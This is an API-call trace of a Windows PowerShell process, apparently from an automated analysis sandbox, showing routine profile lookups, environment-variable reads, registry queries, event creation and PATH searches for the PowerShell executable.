	[0725.308] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ba3d970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0725.308] CoTaskMemFree (pv=0x1ba3d970) 
	[0725.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0725.308] CoTaskMemAlloc (cb=0x20c) returned 0x1ba3d970
	[0725.308] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1ba3d970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0725.308] CoTaskMemFree (pv=0x1ba3d970) 
	[0725.308] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0725.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0725.309] SetErrorMode (uMode=0x1) returned 0x1
	[0725.309] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d820 | out: lpFileInformation=0x26d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0725.309] SetErrorMode (uMode=0x1) returned 0x1
	[0725.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0725.310] SetErrorMode (uMode=0x1) returned 0x1
	[0725.310] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d820 | out: lpFileInformation=0x26d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0725.310] SetErrorMode (uMode=0x1) returned 0x1
	[0725.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0725.310] SetErrorMode (uMode=0x1) returned 0x1
	[0725.310] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d820 | out: lpFileInformation=0x26d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0725.310] SetErrorMode (uMode=0x1) returned 0x1
	[0725.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0725.311] SetErrorMode (uMode=0x1) returned 0x1
	[0725.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d820 | out: lpFileInformation=0x26d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0725.311] SetErrorMode (uMode=0x1) returned 0x1
	[0725.311] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0725.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.311] CoTaskMemFree (pv=0x44c170) 
	[0725.312] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0725.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.312] CoTaskMemFree (pv=0x44c170) 
	[0725.312] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0725.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.312] CoTaskMemFree (pv=0x44c170) 
	[0725.313] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0725.313] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.313] CoTaskMemFree (pv=0x44c170) 
	[0725.318] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0725.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0725.319] CoTaskMemFree (pv=0x44c170) 
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x394
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0725.322] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0725.323] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x330
	[0725.323] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0725.323] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0727.075] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0727.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.075] CoTaskMemFree (pv=0x44c170) 
	[0727.078] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0727.078] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26da00 | out: lpMode=0x26da00) returned 1
	[0727.080] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0727.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.080] CoTaskMemFree (pv=0x44c170) 
	[0727.085] SetEvent (hEvent=0x2fc) returned 1
	[0727.085] SetEvent (hEvent=0x390) returned 1
	[0727.085] SetEvent (hEvent=0x394) returned 1
	[0727.085] SetEvent (hEvent=0x324) returned 1
	[0727.085] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0727.088] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0727.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0727.088] CoTaskMemFree (pv=0x44c170) 
	[0727.089] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d758 | out: phkResult=0x26d758*=0x39c) returned 0x0
	[0727.089] RegQueryValueExW (in: hKey=0x39c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d6dc, lpData=0x0, lpcbData=0x26d6d8*=0x0 | out: lpType=0x26d6dc*=0x0, lpData=0x0, lpcbData=0x26d6d8*=0x0) returned 0x2

Thread:
	id = 481
	os_tid = 0x11c8


Thread:
	id = 486
	os_tid = 0x11f8


Thread:
	id = 945
	os_tid = 0x1948


Thread:
	id = 947
	os_tid = 0x195c


Thread:
	id = 964
	os_tid = 0x19d0


Thread:
	id = 991
	os_tid = 0x1a6c


Thread:
	id = 1001
	os_tid = 0x1a98

	[0526.368] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0625.817] LocalFree (hMem=0x397290) returned 0x0
	[0625.818] CloseHandle (hObject=0x31c) returned 1
	[0625.818] CloseHandle (hObject=0x13) returned 1
	[0625.819] CloseHandle (hObject=0xf) returned 1
	[0625.819] RegCloseKey (hKey=0x304) returned 0x0
	[0625.819] RegCloseKey (hKey=0x300) returned 0x0
	[0625.820] RegCloseKey (hKey=0x2fc) returned 0x0
	[0625.820] LocalFree (hMem=0x3972e0) returned 0x0
	[0625.820] RegCloseKey (hKey=0x324) returned 0x0
	[0641.284] RegCloseKey (hKey=0x324) returned 0x0
	[0689.499] RegCloseKey (hKey=0x3a8) returned 0x0
	[0689.500] RegCloseKey (hKey=0x388) returned 0x0
	[0689.500] RegCloseKey (hKey=0x384) returned 0x0
	[0689.500] RegCloseKey (hKey=0x380) returned 0x0
	[0689.500] RegCloseKey (hKey=0x37c) returned 0x0
	[0689.501] RegCloseKey (hKey=0x378) returned 0x0
	[0689.501] RegCloseKey (hKey=0x374) returned 0x0
	[0689.501] RegCloseKey (hKey=0x370) returned 0x0
	[0689.501] RegCloseKey (hKey=0x348) returned 0x0
	[0689.501] RegCloseKey (hKey=0x3a4) returned 0x0
	[0689.502] RegCloseKey (hKey=0x3a0) returned 0x0
	[0689.502] RegCloseKey (hKey=0x368) returned 0x0
	[0689.502] RegCloseKey (hKey=0x364) returned 0x0
	[0689.502] RegCloseKey (hKey=0x360) returned 0x0
	[0689.503] RegCloseKey (hKey=0x35c) returned 0x0
	[0689.503] RegCloseKey (hKey=0x358) returned 0x0
	[0689.503] RegCloseKey (hKey=0x354) returned 0x0
	[0689.504] RegCloseKey (hKey=0x350) returned 0x0
	[0689.504] RegCloseKey (hKey=0x34c) returned 0x0
	[0689.504] RegCloseKey (hKey=0x39c) returned 0x0
	[0689.504] RegCloseKey (hKey=0x33c) returned 0x0
	[0689.505] RegCloseKey (hKey=0x338) returned 0x0
	[0689.505] RegCloseKey (hKey=0x334) returned 0x0
	[0689.505] RegCloseKey (hKey=0x330) returned 0x0
	[0689.505] RegCloseKey (hKey=0x32c) returned 0x0
	[0689.506] RegCloseKey (hKey=0x328) returned 0x0
	[0689.506] RegCloseKey (hKey=0x31c) returned 0x0
	[0689.506] RegCloseKey (hKey=0x304) returned 0x0
	[0689.506] RegCloseKey (hKey=0x398) returned 0x0
	[0689.506] RegCloseKey (hKey=0x2fc) returned 0x0
	[0689.507] RegCloseKey (hKey=0x324) returned 0x0
	[0689.507] RegCloseKey (hKey=0x394) returned 0x0
	[0689.507] RegCloseKey (hKey=0x390) returned 0x0
	[0689.507] RegCloseKey (hKey=0x36c) returned 0x0
	[0742.615] RegCloseKey (hKey=0x39c) returned 0x0

Thread:
	id = 1068
	os_tid = 0x183c


Thread:
	id = 1470
	os_tid = 0x1a68

	[0728.561] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0728.566] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0728.572] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0728.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.572] CoTaskMemFree (pv=0x44c170) 
	[0728.574] VirtualQuery (in: lpAddress=0x1c8bdce0, lpBuffer=0x1c8beba0, dwLength=0x30 | out: lpBuffer=0x1c8beba0*(BaseAddress=0x1c8bd000, AllocationBase=0x1bf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0728.577] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0728.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.577] CoTaskMemFree (pv=0x44c170) 
	[0728.580] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0728.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.580] CoTaskMemFree (pv=0x44c170) 
	[0728.583] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0728.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0728.583] CoTaskMemFree (pv=0x44c170) 
	[0730.709] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0730.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.709] CoTaskMemFree (pv=0x44c170) 
	[0730.712] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0730.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.712] CoTaskMemFree (pv=0x44c170) 
	[0730.713] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0730.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.713] CoTaskMemFree (pv=0x44c170) 
	[0730.718] VirtualQuery (in: lpAddress=0x1c8bdf90, lpBuffer=0x1c8bee50, dwLength=0x30 | out: lpBuffer=0x1c8bee50*(BaseAddress=0x1c8bd000, AllocationBase=0x1bf30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0730.719] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0730.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.719] CoTaskMemFree (pv=0x44c170) 
	[0730.722] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0730.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.722] CoTaskMemFree (pv=0x44c170) 
	[0730.722] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0730.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.722] CoTaskMemFree (pv=0x44c170) 
	[0730.724] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0730.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.724] CoTaskMemFree (pv=0x44c170) 
	[0730.728] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0730.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.729] CoTaskMemFree (pv=0x44c170) 
	[0733.805] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0733.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.805] CoTaskMemFree (pv=0x44c170) 
	[0733.807] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0733.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.808] CoTaskMemFree (pv=0x44c170) 
	[0733.809] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0733.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.809] CoTaskMemFree (pv=0x44c170) 
	[0733.812] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0733.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.812] CoTaskMemFree (pv=0x44c170) 
	[0733.813] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0733.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.814] CoTaskMemFree (pv=0x44c170) 
	[0733.815] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0733.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.815] CoTaskMemFree (pv=0x44c170) 
	[0733.817] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0733.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.817] CoTaskMemFree (pv=0x44c170) 
	[0733.836] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0733.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.836] CoTaskMemFree (pv=0x44c170) 
	[0736.666] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0736.666] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0736.666] CoTaskMemFree (pv=0x44c170) 
	[0736.669] CoTaskMemAlloc (cb=0x104) returned 0x44c170
	[0736.669] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x44c170, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0736.669] CoTaskMemFree (pv=0x44c170) 
	[0736.669] CoTaskMemAlloc (cb=0x128) returned 0x1ba475e0
	[0736.669] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1ba475e0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0736.669] CoTaskMemFree (pv=0x1ba475e0) 
	[0736.674] CoTaskMemAlloc (cb=0x20e) returned 0x1ba3f5e0
	[0736.674] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1ba3f5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0736.674] CoTaskMemFree (pv=0x1ba3f5e0) 
	[0736.678] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0736.679] SetErrorMode (uMode=0x1) returned 0x1
	[0738.244] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.254] SetErrorMode (uMode=0x1) returned 0x1
	[0738.255] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0738.255] SetErrorMode (uMode=0x1) returned 0x1
	[0738.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.264] SetErrorMode (uMode=0x1) returned 0x1
	[0738.265] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0738.266] SetErrorMode (uMode=0x1) returned 0x1
	[0738.266] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.274] SetErrorMode (uMode=0x1) returned 0x1
	[0738.276] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0738.276] SetErrorMode (uMode=0x1) returned 0x1
	[0738.276] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.284] SetErrorMode (uMode=0x1) returned 0x1
	[0739.726] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0739.726] SetErrorMode (uMode=0x1) returned 0x1
	[0739.726] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.734] SetErrorMode (uMode=0x1) returned 0x1
	[0739.736] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0739.736] SetErrorMode (uMode=0x1) returned 0x1
	[0739.736] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.744] SetErrorMode (uMode=0x1) returned 0x1
	[0739.745] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0739.745] SetErrorMode (uMode=0x1) returned 0x1
	[0739.745] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.754] SetErrorMode (uMode=0x1) returned 0x1
